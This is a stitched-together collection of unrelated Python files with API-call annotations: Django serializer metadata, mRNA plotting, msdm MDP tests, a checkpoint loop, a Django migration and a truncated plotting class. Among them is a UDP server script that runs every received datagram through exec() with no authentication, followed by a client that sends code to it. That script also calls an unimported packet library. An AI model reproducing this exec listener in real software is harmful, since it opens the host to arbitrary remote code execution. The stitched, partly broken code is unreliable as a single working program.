] | [((1808, 1859), 'rest_framework.serializers.SerializerMethodField', 'serializers.SerializerMethodField', (['"""get_reg_groups"""'], {}), "('get_reg_groups')\n", (1841, 1859), False, 'from rest_framework import serializers\n'), ((3620, 3666), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_group_name"""'}), "(source='get_group_name')\n", (3641, 3666), False, 'from rest_framework import serializers\n'), ((4017, 4063), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_group_name"""'}), "(source='get_group_name')\n", (4038, 4063), False, 'from rest_framework import serializers\n'), ((6720, 6762), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_pesigs"""'}), "(source='get_pesigs')\n", (6741, 6762), False, 'from rest_framework import serializers\n'), ((6779, 6821), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_fnsigs"""'}), "(source='get_fnsigs')\n", (6800, 6821), False, 'from rest_framework import serializers\n'), ((6837, 6884), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_literalsigs"""'}), "(source='get_literalsigs')\n", (6858, 6884), False, 'from rest_framework import serializers\n'), ((6909, 6962), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_peimplementations"""'}), "(source='get_peimplementations')\n", (6930, 6962), False, 'from rest_framework import serializers\n'), ((6987, 7040), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_fnimplementations"""'}), "(source='get_fnimplementations')\n", (7008, 7040), False, 'from rest_framework import serializers\n'), ((1422, 1452), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'group_id'}), '(id=group_id)\n', (1439, 1452), False, 'from django.contrib.auth.models import Group\n'), ((1501, 1539), 'models.RegistryUserGroup.objects.get', 'RegistryUserGroup.objects.get', ([], {'group': 'g'}), '(group=g)\n', (1530, 1539), False, 'from models import RegistryUserGroup\n'), ((7439, 7465), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (7456, 7465), False, 'from vercereg.utils import get_base_rest_uri\n'), ((7703, 7729), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (7720, 7729), False, 'from vercereg.utils import get_base_rest_uri\n'), ((7972, 7998), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (7989, 7998), False, 'from vercereg.utils import get_base_rest_uri\n'), ((8259, 8285), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (8276, 8285), False, 'from vercereg.utils import get_base_rest_uri\n'), ((8548, 8574), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (8565, 8574), False, 'from vercereg.utils import get_base_rest_uri\n'), ((1563, 1589), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (1580, 1589), False, 'from vercereg.utils import get_base_rest_uri\n')] |
import pdb # for debuggin
import sys
import time
import pprint
import fcntl # for get_ip_address
import struct # for get_ip_address
import threading # for threading UDPServer
import socket # for UDPServer
#sys.path.append("./third_party/libs/") # for scapy
import io  # for dummy_exec (in-memory buffers to capture exec output)
#import logging # for logging, scapy modify logging level
#logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
#from scapy.all import *
import anhost # linux networking files
def set_env():
return
def dummy_exec(code):
    # create file-like buffers to capture output and errors
    code_out = io.StringIO()
    code_err = io.StringIO()
    sys.stdout = code_out
    sys.stderr = code_err
    try:
        exec(code)
    except Exception as exc:
        code_err.write(str(exc))
    finally:
        # restore stdout and stderr
        sys.stdout = sys.__stdout__
        sys.stderr = sys.__stderr__
    # for now throw away the errors and return only the captured stdout
    return str(code_out.getvalue())
def handle_pkt(eth):
eth_src = ':'.join(hex(x) for x in map(ord, eth.src))
eth_dst = ':'.join(hex(x) for x in map(ord, eth.dst))
if eth.type != dpkt.ethernet.ETH_TYPE_IP:
#print "Ethernet pkt"
return
ip = eth.data
if ip.p == dpkt.ip.IP_PROTO_UDP:
ip_src = '.'.join(str(x) for x in map(ord, ip.src))
ip_dst = '.'.join(str(x) for x in map(ord, ip.dst))
udp = ip.data
udp_src = udp.sport
udp_dst = udp.dport
udp_data = dummy_exec(str(udp.data))
print(ip_src, ip_dst)
send(IP(dst=ip_dst,src=ip_src)/UDP(sport=udp_src,dport=udp_dst)/udp_data,\
iface="eth1", verbose=True)
else:
return
print(anhost.get_int_ip())
HOST, PORT = str(anhost.get_int_ip()), 50000
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((HOST,PORT))
while True:
msg, addr = sock.recvfrom(1024)
print("msg:", msg)
server_thread = threading.Thread(target=dummy_exec,args=(msg,))
server_thread.start()
print(server_thread.join())
| [
"threading.Thread",
"socket.socket",
"anhost.get_int_ip"
] | [((1695, 1743), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (1708, 1743), False, 'import socket\n'), ((1622, 1641), 'anhost.get_int_ip', 'anhost.get_int_ip', ([], {}), '()\n', (1639, 1641), False, 'import anhost\n'), ((1853, 1901), 'threading.Thread', 'threading.Thread', ([], {'target': 'dummy_exec', 'args': '(msg,)'}), '(target=dummy_exec, args=(msg,))\n', (1869, 1901), False, 'import threading\n'), ((1660, 1679), 'anhost.get_int_ip', 'anhost.get_int_ip', ([], {}), '()\n', (1677, 1679), False, 'import anhost\n')] |
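A matching client sketch for the exec server loop above; the server address and payload are illustrative only.

# client.py - send a snippet of Python source to the UDP exec server above.
import socket

SERVER = ("192.168.1.10", 50000)  # replace with the server's internal IP
payload = b"print('hello from the UDP exec server')"

client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(payload, SERVER)
client.close()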
#%%
import os
import pickle
import cloudpickle
import itertools
import glob
import numpy as np
import scipy as sp
import pandas as pd
import git
# Import matplotlib stuff for plotting
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
# Seaborn, useful for graphics
import seaborn as sns
# Import the project utils
import ccutils
# Set PBoC plotting format
ccutils.viz.set_plotting_style()
# Increase dpi
#%%
# Find home directory for repo
repo = git.Repo("./", search_parent_directories=True)
homedir = repo.working_dir
# Define directories for data and figure
figdir = f'{homedir}/fig/si/'
datadir = f'{homedir}/data/mRNA_FISH/'
mcmcdir = f'{homedir}/data/mcmc/'
# %%
# Read the data
df = pd.read_csv(f'{datadir}Jones_Brewster_2014.csv', index_col=0)
# Extract the lacUV5 data
dfUV5 = df[df.experiment == 'UV5']
# Load the flat-chain
with open(f'{mcmcdir}lacUV5_constitutive_mRNA_prior.pkl', 'rb') as file:
unpickler = pickle.Unpickler(file)
gauss_flatchain = unpickler.load()
gauss_flatlnprobability = unpickler.load()
# Generate a Pandas Data Frame with the mcmc chain
index = ['kp_on', 'kp_off', 'rm']
# Generate a data frame out of the MCMC chains
df_mcmc = pd.DataFrame(gauss_flatchain, columns=index)
# rerbsine the index with the new entries
index = df_mcmc.columns
# map value of the parameters
max_idx = np.argmax(gauss_flatlnprobability, axis=0)
kp_on, kp_off, rm = df_mcmc.iloc[max_idx, :]
# Define bins
bins = np.arange(0, dfUV5.mRNA_cell.max())
logp_mRNA = ccutils.model.log_p_m_unreg(bins, kp_on, kp_off, 1, rm)
# Plot the histogram of the data with bins of width 1
_ = plt.hist(dfUV5.mRNA_cell, bins=bins, density=1, histtype='stepfilled',
alpha=1, label='sm-FISH data', align='left', lw=0)
plt.step(bins, np.exp(logp_mRNA), color='r', ls='-', lw=1.5,
label='two-state promoter fit')
# Label the plot
plt.xlabel('mRNA / cell')
plt.ylabel('probability')
plt.legend()
plt.tight_layout()
plt.savefig(f'{figdir}/figS03.pdf', bbox_inches='tight')
| [
"pandas.DataFrame",
"matplotlib.pyplot.hist",
"numpy.argmax",
"pandas.read_csv",
"matplotlib.pyplot.legend",
"git.Repo",
"ccutils.model.log_p_m_unreg",
"ccutils.viz.set_plotting_style",
"numpy.exp",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.tight_layout",
"pickle.Unpickler",
"matplotlib.pyplot.savefig"
] | [((394, 426), 'ccutils.viz.set_plotting_style', 'ccutils.viz.set_plotting_style', ([], {}), '()\n', (424, 426), False, 'import ccutils\n'), ((486, 532), 'git.Repo', 'git.Repo', (['"""./"""'], {'search_parent_directories': '(True)'}), "('./', search_parent_directories=True)\n", (494, 532), False, 'import git\n'), ((733, 794), 'pandas.read_csv', 'pd.read_csv', (['f"""{datadir}Jones_Brewster_2014.csv"""'], {'index_col': '(0)'}), "(f'{datadir}Jones_Brewster_2014.csv', index_col=0)\n", (744, 794), True, 'import pandas as pd\n'), ((1226, 1270), 'pandas.DataFrame', 'pd.DataFrame', (['gauss_flatchain'], {'columns': 'index'}), '(gauss_flatchain, columns=index)\n', (1238, 1270), True, 'import pandas as pd\n'), ((1379, 1421), 'numpy.argmax', 'np.argmax', (['gauss_flatlnprobability'], {'axis': '(0)'}), '(gauss_flatlnprobability, axis=0)\n', (1388, 1421), True, 'import numpy as np\n'), ((1538, 1593), 'ccutils.model.log_p_m_unreg', 'ccutils.model.log_p_m_unreg', (['bins', 'kp_on', 'kp_off', '(1)', 'rm'], {}), '(bins, kp_on, kp_off, 1, rm)\n', (1565, 1593), False, 'import ccutils\n'), ((1653, 1778), 'matplotlib.pyplot.hist', 'plt.hist', (['dfUV5.mRNA_cell'], {'bins': 'bins', 'density': '(1)', 'histtype': '"""stepfilled"""', 'alpha': '(1)', 'label': '"""sm-FISH data"""', 'align': '"""left"""', 'lw': '(0)'}), "(dfUV5.mRNA_cell, bins=bins, density=1, histtype='stepfilled',\n alpha=1, label='sm-FISH data', align='left', lw=0)\n", (1661, 1778), True, 'import matplotlib.pyplot as plt\n'), ((1909, 1934), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""mRNA / cell"""'], {}), "('mRNA / cell')\n", (1919, 1934), True, 'import matplotlib.pyplot as plt\n'), ((1935, 1960), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""probability"""'], {}), "('probability')\n", (1945, 1960), True, 'import matplotlib.pyplot as plt\n'), ((1961, 1973), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (1971, 1973), True, 'import matplotlib.pyplot as plt\n'), ((1974, 1992), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1990, 1992), True, 'import matplotlib.pyplot as plt\n'), ((1993, 2049), 'matplotlib.pyplot.savefig', 'plt.savefig', (['f"""{figdir}/figS03.pdf"""'], {'bbox_inches': '"""tight"""'}), "(f'{figdir}/figS03.pdf', bbox_inches='tight')\n", (2004, 2049), True, 'import matplotlib.pyplot as plt\n'), ((969, 991), 'pickle.Unpickler', 'pickle.Unpickler', (['file'], {}), '(file)\n', (985, 991), False, 'import pickle\n'), ((1804, 1821), 'numpy.exp', 'np.exp', (['logp_mRNA'], {}), '(logp_mRNA)\n', (1810, 1821), True, 'import numpy as np\n')] |
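A quick sanity check that could follow the fit above, assuming the 1 passed to log_p_m_unreg is the mRNA degradation rate: for the two-state (telegraph) model the mean count is rm * kp_on / (kp_on + kp_off). This snippet is an added sketch, not part of the original figure script.

mean_model = rm * kp_on / (kp_on + kp_off)
mean_data = dfUV5.mRNA_cell.mean()
print(f'model mean mRNA: {mean_model:.2f} | sample mean: {mean_data:.2f}')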
import pickle
import time
from datetime import datetime
def checkpoint(shared_model, shared_dataset, args):
try:
while True:
# Save dataset
file = open(args.data, 'wb')
pickle.dump(list(shared_dataset), file)
file.close()
# Save model
now = datetime.now().strftime("%d_%m_%H_%M")
shared_model.save('models/checkpoint_{}.model'.format(now))
time.sleep(10 * 60)
except KeyboardInterrupt:
print('exiting checkpoint')
| [
"datetime.datetime.now",
"time.sleep"
] | [((452, 471), 'time.sleep', 'time.sleep', (['(10 * 60)'], {}), '(10 * 60)\n', (462, 471), False, 'import time\n'), ((328, 342), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (340, 342), False, 'from datetime import datetime\n')] |
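A sketch of how the checkpoint loop might be started from a training script. The dummy model, the args namespace and the dataset list are placeholders; only checkpoint() itself comes from the module above.

import threading
from types import SimpleNamespace

class DummyModel:
    def save(self, path):
        print('saving checkpoint to', path)

args = SimpleNamespace(data='dataset.pkl')
shared_dataset = []
worker = threading.Thread(target=checkpoint,
                          args=(DummyModel(), shared_dataset, args),
                          daemon=True)
worker.start()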
import unittest
import numpy as np
from frozendict import frozendict
from msdm.core.distributions import DictDistribution
from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP
from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid
from msdm.domains import GridWorld
class MyTestCase(unittest.TestCase):
def test_policy_iteration(self):
mdp = Counter(3)
res = PolicyIteration().plan_on(mdp)
out = res.policy.run_on(mdp)
assert out.state_traj == (0, 1, 2)
assert out.action_traj == (1, 1, 1)
assert res.policy.action(0) == 1
assert res.policy.action(1) == 1
assert res.policy.action(2) == 1
def test_policy_iteration_geometric(self):
mdp = Geometric(p=1/13)
res = PolicyIteration(iterations=500).plan_on(mdp)
assert np.isclose(res.V[0], -13), res.V
def test_policy_iteration_varying_action_number(self):
mdp = VaryingActionNumber()
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[0], -2), res.V
assert res.policy.run_on(mdp).action_traj == (+1, +1)
def test_equal_value(self):
'''
In this MDP, the value at the non-initial, non-terminal corners is equal.
This means the policy at the start state should assign equal probability
to either.
'''
mdp = GridWorld(
tile_array=[
'.g',
's.',
],
feature_rewards={'g': 0},
step_cost=-1,
)
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[frozendict(x=0, y=1)], res.V[frozendict(x=1, y=0)])
assert res.policy.action_dist(frozendict(x=0, y=0)).\
isclose(DictDistribution({
frozendict({'dx': 0, 'dy': 0}): 0,
frozendict({'dx': 1, 'dy': 0}): 1/2,
frozendict({'dx': -1, 'dy': 0}): 0,
frozendict({'dy': 1, 'dx': 0}): 1/2,
frozendict({'dy': -1, 'dx': 0}): 0
}))
assert res.policy.action_dist(frozendict(x=0, y=1)).isclose(DictDistribution({
frozendict({'dx': 1, 'dy': 0}): 1,
}))
def test_policy_iteration_gridworld(self):
gw = GridWorld(
tile_array=[
'......g',
'...####',
'..##...',
'..#....',
'.......',
'####...',
's......',
])
pi_res = PolicyIteration()(gw)
vi_res = ValueIteration()(gw)
lrtdp = LRTDP()(gw)
assert pi_res.initial_value == vi_res.initial_value == lrtdp.initial_value
def test_policy_iteration_gridworld2(self):
gw = GridWorld((
'..g..',
'.###.',
'..#..',
'..s..'
), discount_rate=1 - 1e-5)
pi = PolicyIteration().plan_on(gw)
vi = ValueIteration().plan_on(gw)
reachable = sorted(gw.reachable_states(),
key=lambda s: (s['x'], s['y']))
pi_mat = pi.policy.as_matrix(reachable, gw.action_list)
vi_mat = vi.policy.as_matrix(reachable, gw.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
def test_policy_iteration_and_value_iteration_russell_norvig(self):
for discount_rate in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
for slip_prob in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
gw = make_russell_norvig_grid(
discount_rate=discount_rate,
slip_prob=slip_prob,
)
vi_res = ValueIteration(iterations=int(1e3)).plan_on(gw)
pi_res = PolicyIteration(iterations=int(1e3)).plan_on(gw)
assert np.isclose(vi_res._qvaluemat, pi_res._qvaluemat, atol=5e-4).all()
def test_policy_iteration_heavenorhell(self):
# technically a pomdp, but we can solve underlying mdp
from msdm.domains.heavenorhell import HeavenOrHell
for discount_rate in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
for coherence in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
print(discount_rate, coherence)
hh = HeavenOrHell(
coherence=coherence,
grid=
"""
hcg
#.#
#s#
""",
discount_rate=discount_rate,
heaven_reward=50,
hell_reward=-50,
)
pi = PolicyIteration().plan_on(hh)
vi = ValueIteration().plan_on(hh)
reachable = sorted(hh.reachable_states())
pi_mat = pi.policy.as_matrix(reachable, hh.action_list)
vi_mat = vi.policy.as_matrix(reachable, hh.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"msdm.algorithms.PolicyIteration",
"msdm.tests.domains.Counter",
"msdm.tests.domains.Geometric",
"msdm.algorithms.ValueIteration",
"msdm.tests.domains.make_russell_norvig_grid",
"msdm.algorithms.LRTDP",
"numpy.isclose",
"msdm.domains.GridWorld",
"msdm.domains.heavenorhell.HeavenOrHell",
"msdm.tests.domains.VaryingActionNumber",
"frozendict.frozendict"
] | [((5289, 5304), 'unittest.main', 'unittest.main', ([], {}), '()\n', (5302, 5304), False, 'import unittest\n'), ((422, 432), 'msdm.tests.domains.Counter', 'Counter', (['(3)'], {}), '(3)\n', (429, 432), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((787, 806), 'msdm.tests.domains.Geometric', 'Geometric', ([], {'p': '(1 / 13)'}), '(p=1 / 13)\n', (796, 806), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((879, 904), 'numpy.isclose', 'np.isclose', (['res.V[0]', '(-13)'], {}), '(res.V[0], -13)\n', (889, 904), True, 'import numpy as np\n'), ((986, 1007), 'msdm.tests.domains.VaryingActionNumber', 'VaryingActionNumber', ([], {}), '()\n', (1005, 1007), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((1068, 1092), 'numpy.isclose', 'np.isclose', (['res.V[0]', '(-2)'], {}), '(res.V[0], -2)\n', (1078, 1092), True, 'import numpy as np\n'), ((1415, 1489), 'msdm.domains.GridWorld', 'GridWorld', ([], {'tile_array': "['.g', 's.']", 'feature_rewards': "{'g': 0}", 'step_cost': '(-1)'}), "(tile_array=['.g', 's.'], feature_rewards={'g': 0}, step_cost=-1)\n", (1424, 1489), False, 'from msdm.domains import GridWorld\n'), ((2297, 2400), 'msdm.domains.GridWorld', 'GridWorld', ([], {'tile_array': "['......g', '...####', '..##...', '..#....', '.......', '####...', 's......']"}), "(tile_array=['......g', '...####', '..##...', '..#....', '.......',\n '####...', 's......'])\n", (2306, 2400), False, 'from msdm.domains import GridWorld\n'), ((2787, 2859), 'msdm.domains.GridWorld', 'GridWorld', (["('..g..', '.###.', '..#..', '..s..')"], {'discount_rate': '(1 - 1e-05)'}), "(('..g..', '.###.', '..#..', '..s..'), discount_rate=1 - 1e-05)\n", (2796, 2859), False, 'from msdm.domains import GridWorld\n'), ((2554, 2571), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (2569, 2571), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((2593, 2609), 'msdm.algorithms.ValueIteration', 'ValueIteration', ([], {}), '()\n', (2607, 2609), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((2630, 2637), 'msdm.algorithms.LRTDP', 'LRTDP', ([], {}), '()\n', (2635, 2637), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((447, 464), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (462, 464), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((819, 850), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {'iterations': '(500)'}), '(iterations=500)\n', (834, 850), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((1022, 1039), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (1037, 1039), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((1598, 1615), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (1613, 1615), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((1661, 1681), 'frozendict.frozendict', 'frozendict', ([], {'x': '(0)', 'y': '(1)'}), '(x=0, y=1)\n', (1671, 1681), False, 'from frozendict import frozendict\n'), ((1690, 1710), 'frozendict.frozendict', 'frozendict', ([], {'x': '(1)', 'y': '(0)'}), '(x=1, y=0)\n', (1700, 1710), False, 'from frozendict import frozendict\n'), ((2930, 2947), 
'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (2945, 2947), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((2973, 2989), 'msdm.algorithms.ValueIteration', 'ValueIteration', ([], {}), '()\n', (2987, 2989), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((3299, 3343), 'numpy.isclose', 'np.isclose', (['pi.valuefunc[s]', 'vi.valuefunc[s]'], {}), '(pi.valuefunc[s], vi.valuefunc[s])\n', (3309, 3343), True, 'import numpy as np\n'), ((3633, 3707), 'msdm.tests.domains.make_russell_norvig_grid', 'make_russell_norvig_grid', ([], {'discount_rate': 'discount_rate', 'slip_prob': 'slip_prob'}), '(discount_rate=discount_rate, slip_prob=slip_prob)\n', (3657, 3707), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((4420, 4649), 'msdm.domains.heavenorhell.HeavenOrHell', 'HeavenOrHell', ([], {'coherence': 'coherence', 'grid': '"""\n hcg\n #.#\n #s#\n """', 'discount_rate': 'discount_rate', 'heaven_reward': '(50)', 'hell_reward': '(-50)'}), '(coherence=coherence, grid=\n """\n hcg\n #.#\n #s#\n """\n , discount_rate=discount_rate, heaven_reward=50, hell_reward=-50)\n', (4432, 4649), False, 'from msdm.domains.heavenorhell import HeavenOrHell\n'), ((1751, 1771), 'frozendict.frozendict', 'frozendict', ([], {'x': '(0)', 'y': '(0)'}), '(x=0, y=0)\n', (1761, 1771), False, 'from frozendict import frozendict\n'), ((1830, 1860), 'frozendict.frozendict', 'frozendict', (["{'dx': 0, 'dy': 0}"], {}), "({'dx': 0, 'dy': 0})\n", (1840, 1860), False, 'from frozendict import frozendict\n'), ((1881, 1911), 'frozendict.frozendict', 'frozendict', (["{'dx': 1, 'dy': 0}"], {}), "({'dx': 1, 'dy': 0})\n", (1891, 1911), False, 'from frozendict import frozendict\n'), ((1934, 1965), 'frozendict.frozendict', 'frozendict', (["{'dx': -1, 'dy': 0}"], {}), "({'dx': -1, 'dy': 0})\n", (1944, 1965), False, 'from frozendict import frozendict\n'), ((1986, 2016), 'frozendict.frozendict', 'frozendict', (["{'dy': 1, 'dx': 0}"], {}), "({'dy': 1, 'dx': 0})\n", (1996, 2016), False, 'from frozendict import frozendict\n'), ((2039, 2070), 'frozendict.frozendict', 'frozendict', (["{'dy': -1, 'dx': 0}"], {}), "({'dy': -1, 'dx': 0})\n", (2049, 2070), False, 'from frozendict import frozendict\n'), ((2124, 2144), 'frozendict.frozendict', 'frozendict', ([], {'x': '(0)', 'y': '(1)'}), '(x=0, y=1)\n', (2134, 2144), False, 'from frozendict import frozendict\n'), ((2189, 2219), 'frozendict.frozendict', 'frozendict', (["{'dx': 1, 'dy': 0}"], {}), "({'dx': 1, 'dy': 0})\n", (2199, 2219), False, 'from frozendict import frozendict\n'), ((3945, 4006), 'numpy.isclose', 'np.isclose', (['vi_res._qvaluemat', 'pi_res._qvaluemat'], {'atol': '(0.0005)'}), '(vi_res._qvaluemat, pi_res._qvaluemat, atol=0.0005)\n', (3955, 4006), True, 'import numpy as np\n'), ((4805, 4822), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (4820, 4822), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((4856, 4872), 'msdm.algorithms.ValueIteration', 'ValueIteration', ([], {}), '()\n', (4870, 4872), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((5163, 5207), 'numpy.isclose', 'np.isclose', (['pi.valuefunc[s]', 'vi.valuefunc[s]'], {}), '(pi.valuefunc[s], vi.valuefunc[s])\n', (5173, 5207), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test some edge cases.
"""
import unittest
from socialgraph import autommittee
class TestPowerHistory(unittest.TestCase):
def setUp(self):
self.G = autommittee.Graph()
self.G.add_edge('b', 'a')
self.G.add_edge('a', 'c')
self.G.add_edge('d', 'c')
self.G.add_edge('e', 'c')
self.G.add_edge('c', 'a')
def tearDown(self):
del self.G
def test_calc_power(self):
self.assertEqual([('a', 1), ('b', 2), ('c', 5)], self.G._nodes['a'].full_power())
self.assertEqual([('c', 1), ('a', 3), ('d', 4), ('e', 5)], self.G._nodes['c'].full_power()) | [
"socialgraph.autommittee.Graph"
] | [((214, 233), 'socialgraph.autommittee.Graph', 'autommittee.Graph', ([], {}), '()\n', (231, 233), False, 'from socialgraph import autommittee\n')] |
# Generated by Django 3.2.5 on 2021-07-20 13:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chat', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='chatmessage',
name='user_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='sender'),
),
]
| [
"django.db.models.ForeignKey",
"django.db.migrations.swappable_dependency"
] | [((227, 284), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (258, 284), False, 'from django.db import migrations, models\n'), ((461, 590), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': 'settings.AUTH_USER_MODEL', 'verbose_name': '"""sender"""'}), "(null=True, on_delete=django.db.models.deletion.CASCADE,\n to=settings.AUTH_USER_MODEL, verbose_name='sender')\n", (478, 590), False, 'from django.db import migrations, models\n')] |
# Copyright 2018 <NAME>, <NAME>, <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Draw plots"""
import os
import math
import numpy as np
import pandas as pd
# forbid GUI
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
# /**
# * Multi Plots Container
# */
class EqualGridFigure(object):
"""Distribute all axes with similar attributes with grids of same size
It can have multi axes in one figure, but all axes will have the same height and width,
so they should describe data of similar attribute.
"""
def __init__(self, num_rows, num_cols, ax_height, ax_width, title=None, font_size=None):
super(EqualGridFigure, self).__init__()
# global settings
if not font_size is None: mpl.rcParams.update({'font.size': font_size})
# figure size
self.num_rows = num_rows
self.num_cols = num_cols
self.fig, self.axes = plt.subplots(
num_rows, num_cols,
figsize=(ax_width * num_cols, max(ax_height * num_rows, 20)))
# figure title
if not title is None:
if font_size is None: self.fig.suptitle(title)
else: self.fig.suptitle(title, fontsize=font_size * 2)
# buffer for each plot
self.cnt = [[0 for cl in range(self.num_cols)] for rw in range(self.num_rows)]
def __getitem__(self, idx_pair):
assert len(idx_pair) == 2
row_id, col_id = idx_pair
if self.num_rows == 1:
if self.num_cols == 1: return self.axes
else: return self.axes[col_id]
else:
if self.num_cols == 1: return self.axes[row_id]
else: return self.axes[row_id][col_id]
def close(self):
plt.close(self.fig)
def subtitle(self, row_id, col_id, subtitle,
x_label=None, y_label=None):
"""Set ax title
Args
----
row_id, col_id : int
indices to specify the exact ax
subtitle : str
title for specified ax
x_label : str
title for x-axis
y_label : str
title for y-axis
"""
ax = self[row_id, col_id]
ax.set_title(subtitle)
if x_label is not None: ax.set_xlabel(x_label)
if y_label is not None: ax.set_ylabel(y_label)
def save_fig(self, path, close=True):
"""Save figure of all axes
Args
----
path : str
path to save the figure
close : bool
if close figure after saving
"""
dirname = os.path.dirname(path)
_, extname = os.path.splitext(path)
extname = extname[1:]
if not os.path.isdir(dirname): os.makedirs(dirname)
self.fig.savefig(path, format=extname, dpi='figure')
if close: self.close()
def lineplot(self, row_id, col_id, x_data, y_data,
label=None, color=None, alpha=None, marker=None, linestyle=None,
vmin=None, vmax=None):
"""Line plot
Args
----
row_id, col_id : int
indices to specify the exact ax
x_data, y_data : <1D-array-like>
data for x-axis and y-axis
label : str
label of data
color : str
specify color to plot
marker : str
point style to plot
linestyle : str
line style to plot
vmin : float
min value of data to plot
vmax : float
max value of data to plot
Draw a line in ax (row_id, col_id).
        It can draw on an ax that already contains other lines.
"""
ax = self[row_id, col_id]
# settings
label = label or 'Line {}'.format(self.cnt[row_id][col_id])
color = color or 'C{}'.format(self.cnt[row_id][col_id])
alpha = alpha or 1
marker = marker or ','
linestyle = linestyle or '-'
ax.plot(x_data, y_data, label=label, \
color=color, alpha=alpha, \
marker=marker, \
linewidth=6.0, linestyle=linestyle)
if vmin: ax.set_ylim(ymin=vmin)
if vmax: ax.set_ylim(ymax=vmax)
self.cnt[row_id][col_id] += 1
def legend(self):
"""Place legend"""
for rw in range(self.num_rows):
for cl in range(self.num_cols):
